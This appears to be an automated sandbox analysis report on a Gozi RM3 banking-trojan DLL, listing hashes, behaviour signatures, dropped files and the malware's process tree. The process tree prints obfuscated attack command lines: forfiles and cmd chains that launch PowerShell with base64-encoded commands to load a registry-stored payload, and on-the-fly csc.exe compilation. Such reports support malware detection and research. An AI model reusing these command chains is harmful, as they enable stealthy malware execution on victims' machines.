Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    07-04-2022 23:51

General

  • Target

    yA0A.tmp.dll

  • Size

    151KB

  • MD5

    55ab2f304f8c2da30aeee7713a95064d

  • SHA1

    aae939cf3995905399e427097fc90c5b62f3d4c3

  • SHA256

    41ae907a2bb73794bb2cff40b429e62305847a3e1a95f188b596f1cf925c4547

  • SHA512

    08bbf78b4154f725399055dfb8a4338ce873297af847a5e30c8b6708e44feeae071fbf7efff9ff2c0b397fdffec5ca52a9591f742092a8f50287e54ce89307d3

Score
10/10

Malware Config

Extracted

Family

gozi_rm3

Attributes
  • build

    300994

rsa_pubkey.base64
rsa_pubkey.plain

Signatures

  • Gozi RM3

    A heavily modified version of Gozi using RM3 loader.

  • Uses Tor communications 1 TTPs

    Malware can proxy its traffic through Tor for more anonymity.

  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 11 IoCs
  • Suspicious use of SetWindowsHookEx 44 IoCs
  • Suspicious use of WriteProcessMemory 58 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:2880
      • C:\Windows\system32\regsvr32.exe
        regsvr32 /s C:\Users\Admin\AppData\Local\Temp\yA0A.tmp.dll
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1556
        • C:\Windows\SysWOW64\regsvr32.exe
          /s C:\Users\Admin\AppData\Local\Temp\yA0A.tmp.dll
          3⤵
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:1648
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA== & exit" /p C:\Windows\system32 /s /m po*l.e*e
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4528
        • C:\Windows\system32\forfiles.exe
          forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA== & exit" /p C:\Windows\system32 /s /m po*l.e*e
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4092
          • C:\Windows\system32\cmd.exe
            /k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA== & exit
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:5012
            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA==
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:5052
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAGgAcgBoAGMAZQB3AGQAYQB4AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAcgBoAGMAZQB3AGQAYQB4AGUAKQAnAA==
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1672
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAGQAZgBvAG0AaABlAGwAcwBvAGgAKQA7AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGYAbwBtAGgAZQBsAHMAbwBoACkAJwA=
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3792
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pymhmkiv\pymhmkiv.cmdline"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:676
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD61A.tmp" "c:\Users\Admin\AppData\Local\Temp\pymhmkiv\CSCD9EFD89091A542C0AB23B90E33CBD27.TMP"
                  7⤵
                    PID:1800
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tj14rzcz\tj14rzcz.cmdline"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4244
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD723.tmp" "c:\Users\Admin\AppData\Local\Temp\tj14rzcz\CSCA35C116F4DFFA2C946F7586C126.TMP"
                    7⤵
                      PID:3472
          • C:\Windows\syswow64\svchost.exe
            C:\Windows\syswow64\svchost.exe
            2⤵
              PID:1216
            • C:\Windows\system32\iexpress.exe
              iexpress.exe /n /q /m C:\Users\Admin\AppData\Local\Temp\D055.bin
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1032
              • C:\Windows\system32\makecab.exe
                C:\Windows\system32\makecab.exe /f "C:\Users\Admin\~Oldday.DDF"
                3⤵
                  PID:3820
            • C:\Program Files (x86)\Internet Explorer\ielowutil.exe
              "C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
              1⤵
                PID:3456
              • C:\Program Files\Internet Explorer\iexplore.exe
                "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                1⤵
                • Modifies Internet Explorer settings
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:4496
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4496 CREDAT:17410 /prefetch:2
                  2⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:2840
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4496 CREDAT:17414 /prefetch:2
                  2⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:2216
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4496 CREDAT:17418 /prefetch:2
                  2⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:2476
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4496 CREDAT:17422 /prefetch:2
                  2⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:3128
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4496 CREDAT:17426 /prefetch:2
                  2⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:4852
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4496 CREDAT:17430 /prefetch:2
                  2⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:648
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4496 CREDAT:17434 /prefetch:2
                  2⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:1948
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4496 CREDAT:17438 /prefetch:2
                  2⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:704
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4496 CREDAT:17442 /prefetch:2
                  2⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:3224
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4496 CREDAT:17446 /prefetch:2
                  2⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:3952
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4496 CREDAT:17450 /prefetch:2
                  2⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:3616

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

                Filesize

                717B

                MD5

                54e9306f95f32e50ccd58af19753d929

                SHA1

                eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

                SHA256

                45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

                SHA512

                8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

                Filesize

                192B

                MD5

                fa80583644c293df44af80055173075c

                SHA1

                261726c86ecb2579fc669d073ea49c4cbe1eced6

                SHA256

                a1f1a07bf3090b3549248755e6ade65ca5bd137a6ec645923faff0ed6b6101db

                SHA512

                0af32f372d4185eff599d8164f1cf5d7d61b8004023005cfdd4412393ae7974c2a69b9e5895b711c120c93b0284474779623bc3bf82866c02db1ece8c6039389

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                Filesize

                2KB

                MD5

                d85ba6ff808d9e5444a4b369f5bc2730

                SHA1

                31aa9d96590fff6981b315e0b391b575e4c0804a

                SHA256

                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                SHA512

                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

              • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\ves0881\imagestore.dat

                Filesize

                430B

                MD5

                7fe8682d672b216706de32ef1245b77f

                SHA1

                6f594f459752994bfa289f25cfd7c882587aa318

                SHA256

                db91e16cc22205a74431b9a13e89427e28873955e0ca627c9ba568a572b810dc

                SHA512

                8236b37c29ca164bcb286cb5dfbcae6198d8cfd9e569c7ccd019121f03ff1f161c028e65a5898fa9aa364679d8008517eb88bdc66d2257bf6ce08bcff4185549

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\K6H59MEI\favicon[2].ico

                Filesize

                318B

                MD5

                a976d227e5d1dcf62f5f7e623211dd1b

                SHA1

                a2a9dc1abdd3d888484678663928cb024c359ee6

                SHA256

                66332859bd8e3441a019e073a318b62a47014ba244121301034b510dc7532271

                SHA512

                6754d545f2ce095cfa1fa7ca9e3223f89e37726ee7e541ebcf3e209e18b2602f3be8677598cb30d697327a63de032c11dbf8ef7ad7889a79c488a21044c1cb3f

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                64B

                MD5

                d8b9a260789a22d72263ef3bb119108c

                SHA1

                376a9bd48726f422679f2cd65003442c0b6f6dd5

                SHA256

                d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

                SHA512

                550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                1KB

                MD5

                9b53429e28f910e125239e95e23ef267

                SHA1

                8963b2eb63e21642545b2a023e7fb41332a23e13

                SHA256

                20f516fc915cd85d967a78663cdc344b70d99fcb79fc0f96bb199def8c7b4cd2

                SHA512

                db592560dc8c20866634be7cc0a576873e5e0efab6d8ba700eb5a822aa8fc409a337a474320df161bb45503608a6065664a15d685dc04994960706d5bc986055

              • C:\Users\Admin\AppData\Local\Temp\RESD61A.tmp

                Filesize

                1KB

                MD5

                dcaca3cc08c58942e2cc48d398c051cc

                SHA1

                e7777ffce67b548ad77e5821acfe12632be4f07d

                SHA256

                870ba509355e287f0068f1ad6e1374255ad5d8d7c8a129459eff4df107e98840

                SHA512

                8a51b3bed6fb75cebc7f7941e8785d280c72859bb320d220ccc43d0fc868b5aaf0b95d874a695fc05c583f4c9f3b944ca3e9e19c6a444eff52657333b229e536

              • C:\Users\Admin\AppData\Local\Temp\RESD723.tmp

                Filesize

                1KB

                MD5

                79ef1adc141885e7c1fab7c8e1aa08d6

                SHA1

                419f2bec7367a54cd9b96207176cf9229c527044

                SHA256

                91bd76f1b92550e654caa4e11a88209ef6bdeb2f4fcd37d5bc106ddac4561fe7

                SHA512

                b7cff07aeaa103170c3437378d8c97f785e0cc2d1cdd4729f85f874435c55b7c8a3cca5091d3e41848159fa4ab91b68408ef50d09eff1c4bfcd9781687a46efa

              • C:\Users\Admin\AppData\Local\Temp\pymhmkiv\pymhmkiv.dll

                Filesize

                3KB

                MD5

                8e048c82fd9cae2918237866244b0838

                SHA1

                56dc1be424cea13fb2b2128ad06a1973e8b7361a

                SHA256

                40e2d8f2e3a97e9c507ab469df004afdb6d098363d21de7073764f91f9494e5f

                SHA512

                8ef97123a476c4d7fb7ee2faab19f8923a4852c04c229f1ca6e2640584f0537f805f21af56201f8f16890a4978b14359f1ab17d942487ce1d34932d5eeabddc7

              • C:\Users\Admin\AppData\Local\Temp\tj14rzcz\tj14rzcz.dll

                Filesize

                3KB

                MD5

                2c4685d7cc75232c89691e9a14db6f8b

                SHA1

                832fbc104560aa3a44746c29930de8d8004dc962

                SHA256

                7c67798b5f022741bda0959f3f370d5bfe9177939d2768171cee3d7c1d6d2900

                SHA512

                87a3e389c4a6142be4bd52722437fca9adc43a1ddcc3e7c8aeb6a44fcfea2e648f568541eb5716557df01aa530c0a8fcae1d238a98274435506c3bd6a0e2f761

              • C:\Users\Admin\~Oldday.CAB

                Filesize

                135B

                MD5

                8dd977346280088ba49db5efcc967c2a

                SHA1

                e239044e59a398fb73d575a0beac99a8f36a3e5c

                SHA256

                2fd1309c5c323415df717e1f1bb085711f3212816b20faffbbfe01bc058f22e1

                SHA512

                5356755022ae66d42f4422f45bbbaa44a86993d79301737e1231386febdbbf201807b6ce984aa858b8b1e2962f355ec692b4776ef3efab19267bc3a824d02127

              • C:\Users\Admin\~Oldday.DDF

                Filesize

                764B

                MD5

                a9ba276ae8766ba075ce7376199b0127

                SHA1

                fcceb6d688063d75bd21c5de48e86bee5aa4dc59

                SHA256

                4dcd519f3608306318d399aa7c428fafe51112c7abf417d769d8cdb2f5751c9e

                SHA512

                5e8e8fcd287936003fd63e43dccdaee28a26122207b0fe3bc60a167b57b4ace19dd586e9b2cf569c13725ae9b2a8e163b4c5beea31eb02a43872225761b9ebea

              • C:\Users\Admin\~Oldday.RPT

                Filesize

                283B

                MD5

                bfe355da2ee8f53ab180660e60ec0fea

                SHA1

                65350dab6a0d4f7e92fc30916d9e7f34f681d62f

                SHA256

                674583d0aabd3cc0abb0f55daa7ad9460a99e79a63a906452a27491f2a3e4ee3

                SHA512

                7fd835d1d399226de6e3f9cfe41788effdbf2a31aad08849294e9e065339c9ecb35150a446a4733dc74f4df24a50be8bbf3b4b9827466ba16738c2a1c34743c8

              • C:\Users\Admin\~Oldday_LAYOUT.INF

                Filesize

                964B

                MD5

                2c2ed97842124c3b769153c8baaec7f3

                SHA1

                7fa0cdc13610e3bd6581d2d75763f752342fd574

                SHA256

                450894b4711eefd8e970c04de1d78f34ab3861eb3d1b3dbec9f9fb7b7d53cd98

                SHA512

                120a3aa4ac9c172facdd143e4ac2fa44c19138e893659d07c3dbfcaec3e2ea07bb788d61a6dde4df1b367e85b88c3be5f050850156ec5aed1f37d87bcc5c3ff5

              • \??\c:\Users\Admin\AppData\Local\Temp\pymhmkiv\CSCD9EFD89091A542C0AB23B90E33CBD27.TMP

                Filesize

                652B

                MD5

                cee1e6f43b07656f93e048563d1c1cf0

                SHA1

                bfdcceb3cfd4c711d85cd10081175b5e30172d1a

                SHA256

                bb726263014232ddc3958312b3821d50aad5d8fb630d31151740a7bc7b031610

                SHA512

                49c55d70ddc5aa36e7e6fdd4a5db3dbfdf135045b080c44b8317ba5e77e195a550ca4cb4a25fcf5de047cac62d8266ca37eff6fd0829023d8b914d569790204e

              • \??\c:\Users\Admin\AppData\Local\Temp\pymhmkiv\pymhmkiv.0.cs

                Filesize

                417B

                MD5

                cdc42ce046de74fa8cb97234640cfcc5

                SHA1

                8a6aa5bda682fbb11bc974d752408593aec799cc

                SHA256

                7fca4a3b3889149b375ce11cd1614298a244c05e3dd5fa343be56986aaa675c5

                SHA512

                c2663ca8817dc7a375c06cfc4adb529ab61b098663a550feba5dabe8b9c6269a5e878419d5198cb463b9c6b4d5acb504587ffd5721eab568068a7e9d45d55d13

              • \??\c:\Users\Admin\AppData\Local\Temp\pymhmkiv\pymhmkiv.cmdline

                Filesize

                369B

                MD5

                d73ec5507828d7ba9c31b9146aa34d3c

                SHA1

                319b9f37e3323495c074299d7d5368703d2fc0bd

                SHA256

                8abdd779d00143e90c3504228e6362782c29ba67f3eabfe6d5e12f67c3b159bf

                SHA512

                0a50b15ee6a683e6596c56ee95c267f9aa8b29d08e8fb226daf661191ee0f537e7d23e21e9368b14bce7aed7b601e1321824a42d105d5af5db177a965e23bdea

              • \??\c:\Users\Admin\AppData\Local\Temp\tj14rzcz\CSCA35C116F4DFFA2C946F7586C126.TMP

                Filesize

                652B

                MD5

                a4ae31dca8b44e1ad5028a1b5c69ef39

                SHA1

                fb48e668ee7f131e9be4944c9f942d83f85fe447

                SHA256

                93d4e36026eb26fccec22a86670629137ec435d2f6e4194463a95975270dcf9a

                SHA512

                dc972ae56a94b6e824f9d2c4d79b4b99a2fe6118da8d746480ef9552b27e8d77d8225b5291cec68560433c9d881e80fe7012be08a90cff41f109e3857f234a68

              • \??\c:\Users\Admin\AppData\Local\Temp\tj14rzcz\tj14rzcz.0.cs

                Filesize

                416B

                MD5

                e991aa9d35bfffc8f1e0d5dcf4c95ed1

                SHA1

                02d81b5b8cfd7b25d4fa0dab40d6ce6db3129501

                SHA256

                2598df56dcfc916eb9ae7b571c67d2feb92740843e36caccf9df705c03145265

                SHA512

                e0205253f43832674a3ea5dbe376e82fe0a59722ca10bed0184ff8fa298111957437db32aefb725b8c525f62aa8c7bc14922fa665ec9ced0d465d91837da126b

              • \??\c:\Users\Admin\AppData\Local\Temp\tj14rzcz\tj14rzcz.cmdline

                Filesize

                369B

                MD5

                e8ac3497d72db8692c84a3b5f2a52ee9

                SHA1

                5898dd6cee2e0750076a8698562cfe52cb534481

                SHA256

                c610272a79d7a1c3f4c8f8d52fb0c8550792789fd30d537702b0e03f92375d52

                SHA512

                3f9396dfd806a6a7b8e81b3e6d768cd813c3e06f38e8ca403f15dfe548c640e29aec04a3fbcd2686790e070ba8e28accd96a637c728b9b6c14964e692405ef88

              • memory/1648-131-0x0000000010000000-0x000000001000F000-memory.dmp

                Filesize

                60KB

              • memory/1648-136-0x00000000008A0000-0x00000000008B0000-memory.dmp

                Filesize

                64KB

              • memory/1648-178-0x0000000000800000-0x000000000080E000-memory.dmp

                Filesize

                56KB

              • memory/1672-152-0x00007FF935600000-0x00007FF9360C1000-memory.dmp

                Filesize

                10.8MB

              • memory/3792-158-0x00007FF935600000-0x00007FF9360C1000-memory.dmp

                Filesize

                10.8MB

              • memory/3792-159-0x0000023A7CDC0000-0x0000023A7CDC2000-memory.dmp

                Filesize

                8KB

              • memory/3792-160-0x0000023A7CDC3000-0x0000023A7CDC5000-memory.dmp

                Filesize

                8KB

              • memory/5052-155-0x0000018EC6DB6000-0x0000018EC6DB8000-memory.dmp

                Filesize

                8KB

              • memory/5052-151-0x00007FF935600000-0x00007FF9360C1000-memory.dmp

                Filesize

                10.8MB

              • memory/5052-153-0x0000018EC6DB0000-0x0000018EC6DB2000-memory.dmp

                Filesize

                8KB

              • memory/5052-149-0x0000018EC6D70000-0x0000018EC6D92000-memory.dmp

                Filesize

                136KB

              • memory/5052-176-0x0000018EDF110000-0x0000018EDF123000-memory.dmp

                Filesize

                76KB

              • memory/5052-154-0x0000018EC6DB3000-0x0000018EC6DB5000-memory.dmp

                Filesize

                8KB